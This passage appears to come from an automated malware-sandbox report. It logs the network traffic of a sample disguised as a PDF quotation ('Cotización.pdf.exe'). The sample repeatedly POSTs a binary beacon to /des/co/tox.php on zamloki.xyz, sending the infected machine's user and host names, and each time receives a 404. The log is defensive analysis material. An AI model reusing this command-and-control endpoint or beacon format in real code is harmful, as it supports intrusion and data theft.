                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:52.246175051 CEST5685OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:52.794742107 CEST5686INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:52 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=I9hktZI7f3hF%2Br8oXK9EADPH%2BmTxuRPbWPozNTkqGYNKso9TT3CV%2Fi%2F8HCx1jSRYCjIGnzccIe5eJcKC%2FDXTLMtjrOrm4tnkYPznNnnqAUP3V7%2FmGy9YOCdhib%2B1sw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 672550108a68176e-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    11192.168.2.349739104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:01:54.095599890 CEST1297OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:01:54.113643885 CEST1298OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:01:54.363656044 CEST1299INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:01:54 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dt262YAMj1b1cl%2FU2QPnzN56dRBKOoSXakQQOBRMR%2BmDpPuj905%2FknO0nol4cgw6ghoUhGP6xmG5Rc0AHhnc6YEdygerstyubWXXBtD%2FCfqw62Eqy9hjS07GDGKuCA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254ea52be32bce-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    110192.168.2.349849104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:53.008341074 CEST5687OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:53.026616096 CEST5687OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:53.277317047 CEST5688INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:53 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=u%2FQeXjFhr8fk%2FRtmc2rGpFA4ruI28HxXYwaEiG%2B9m%2BIg%2B37K7j4bpDhkNmU%2BPRdc3bR4S2vfL9emPvavM15TBNQ%2FTq5IdPPIR%2Fr%2B1WS2axQb8uutgtr%2BUdbNT7cjpQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 672550155dba4e7f-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    111192.168.2.349850104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:53.500319004 CEST5689OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:53.520234108 CEST5689OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:53.760759115 CEST5690INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:53 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YvgcFHGTRVx8gDCfZZqxu%2BIukjBs2d%2FbiexZBVf4CSWztcSjg31GpYgcGboturvOCd0iP54edCPfpuo0ngwLwGUEz30rps4Jy%2FLmAlt2XKqUt2fPBuzxfkJQ4JaCZg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 6725501878430eab-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    112192.168.2.349851172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:54.057066917 CEST5691OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:54.075777054 CEST5691OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:54.343905926 CEST5692INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:54 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=H4fSbvld4Q9y7CWGnF5wz%2BEtmg2JFjUF8av%2Fk%2BPOc11kYouSN7RpUsYgqIwGEZWeWAw%2BTs5i1NRlkoHq62MaF5yTnlJJGZLfjCCTbK6iENq5fJhav563Hd3sXPsdsA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 6725501bee824e6e-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    113192.168.2.349852104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:54.588300943 CEST5692OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:54.608359098 CEST5693OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:54.844561100 CEST5693INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:54 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5Tt3W3re%2B8uvY7BCuFqKYkVxCDsnOK9YtjbvK%2Bz84aZ1cab5HvNKxALQGVP%2Fl1Mdv9q0rUjPtuO%2FzcABw6qsKcsYWtXASGWVDl0KQOsRU%2BM0K1FO1PEkxahd4%2Bt%2FIw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 6725501f48ef4a9d-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    114192.168.2.349853172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:55.084563971 CEST5694OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:55.102489948 CEST5695OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:55.376800060 CEST5695INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:55 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9N7aW5rVj6z%2BNYo3MLOIWDlpALN3GrLNgVKfchYUCgYxLf0fpnY31P6L0a0hVLCdp4u50VCIiah0Ou5TDSk6p8HtkN7vhfMJ0d2rtMA7wgg%2FbjK3Y2QONZqkSqjtzA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 672550225a6b1f4d-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    115192.168.2.349854104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:55.635201931 CEST5696OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:55.655184984 CEST5696OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:55.908862114 CEST5697INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:55 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=prl26dPhuC%2Fqb%2BZzybr1U9PofPe9QwYqKUCe%2F0KutB35O%2BYtqKDR7piRvoQLdW6u2QRUXi01AAJJUwQsLz283EA5x%2FMeH49dNq0fxNSziCUvaQQc%2BIyYmfByMzO4DQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67255025ca5f1f15-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    116192.168.2.349855104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:56.175477982 CEST5698OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:56.195302963 CEST5698OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:56.460179090 CEST5699INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:56 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=os2bal99QEHu7Ibz4V7A9Tm0kaYM1NRmZiKfd721xZBt6F9oV%2BhyMLaRF0eOa305tXyJfrunPQ03yF4J6N1%2F%2Fci83AuNF%2B0UgGWgvw%2Bcsfz74bWkyR5DkUUOLyZf6Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 672550292a134a85-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    117192.168.2.349856104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:56.689730883 CEST5700OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:56.708532095 CEST5700OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:56.957372904 CEST5701INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:56 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Jyl3k3XHkbK0n3yzQpF755%2F7SNLj4RtzwU%2BMHBYHM9UYs1OPVYWO%2BzAikkvtFBHH7mk%2Bm%2FC6ufq1AIGHBrb5ytjwWT46pX1atPKJUrSbnKPR%2BK%2F1Vds3AtFBc7ij3A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 6725502c69d42b95-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    118192.168.2.349857172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:57.212747097 CEST5702OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:57.232525110 CEST5702OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:57.479842901 CEST5703INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:57 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ERCFVJHPp64B6DEl9Ey%2B4JkldEkfl%2FzF9oRtt%2BisD6VkOM7RPfgjI0BlSVHrUqGFGBuNYeXGV5LEVMROwihGyCAfadPJnYVL5rxiEAS5S033uW6kLHcPxEgBrZ%2BNZw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 6725502fad7b6449-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    119192.168.2.349858104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:57.699676991 CEST5704OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:57.717665911 CEST5704OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:57.952822924 CEST5705INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:57 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ETYUoRY8H6PKlywJ%2B359WOCoPQ0NOlZezBlQZZ7tjgpsy1t56hVKgyj0PB%2FPORYx9Rovngw0B7cEl4ChyjrnMVEzciN%2FT6KN9oJKqGZUm9%2FJ5PjFtZihv5H9dzTuQA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67255032aad5145a-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    12192.168.2.349740172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:01:54.635314941 CEST1299OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:01:54.655654907 CEST1300OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:01:54.908283949 CEST1300INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:01:54 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=z6lr9YrRM8RVkj2NevDdqKhWMU1PPtYaZq7BOsqWw6p1COL%2BBBsDUk94wFaA6fZdnSn0%2FldLcH3orHYeG8W%2FU5eZtsJiNYl86sZNA%2FSPMrVQ1F1%2Bl41bt7gs1UIpUg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254ea88a0d1776-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    120192.168.2.349859172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Jul 21, 2021 17:02:58.192042112 CEST5706OUTPOST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:58.213493109 CEST5706OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:58.470221996 CEST5707INHTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:58 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Lezyi%2BQ6vCnZBlgZYDJjr1CeBBEbH3EHOh2X7%2F5yYC8TWhcIxJ40LJuXzDakid5QYqr7ixTP8xL6CqRaRUH3B0ZCVyN7pM1%2FD%2BCAljTEPCLyeMGxYRDs2mDhvHPqiA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67255035caeac2c7-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
